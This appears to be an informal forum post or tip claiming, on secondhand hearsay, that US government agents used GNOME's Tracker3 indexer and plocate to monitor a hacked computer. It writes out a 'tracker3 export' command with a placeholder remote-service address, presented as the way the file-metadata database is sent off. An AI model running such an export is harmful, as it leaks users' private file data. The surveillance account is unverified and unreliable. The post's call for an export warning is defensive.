Hello, consider me a guy who happens to know top secret leakers because I've been interacting with amateur researchers that recovered a computer the US Government hacked. And apparently they declassified federal (glowie) tricks
Here are packages the glowies download on the recovered computer
osinfo-db
osinfo-db-tools
libosinfo
libisofs
libiptcdata
libgsf
libgrss
libcue
libtracker-sparql
tracker-3
tracker-miners-3
Here is what the researchers observed and then told me
1.Glowies use tracker-extact-3 to grab meta data from the users files as they update in real time. Tracker Extract does this natively and that is the main thing it is intended to do.
2.Then the glowies run the command (this is the malicious act)
tracker3 export –database=/home/user/.cache/tracker3/files/ –output=json-ld
with an additional `–remote-service=ip_here` so they can send the tracker3 database back to their feddie databases. The json-ld file is read using json reading software to display text and rendered pdf, video and image thumbnails and audio cover art. This gives them real time monitoring of an OS because they are getting recent file meta data.
Glowies also look in plocate databases as well. This is all 100% real. So try to be accurate as possible and not spread misinformation when you finally get to covering it. Tracker3 is not a virus and is inherently NOT harmful software. It does very useful things such as find pdfs and images via GNOME's photo and pdf reader. It is just that it happens to have the potential to be malicious. Said researchers stated that the goal for the community to patch this insecurity by warning if tracker is trying to export meta data base to a foreign server. Meaning the end user should be alerted via the GUI if tracker is doing this.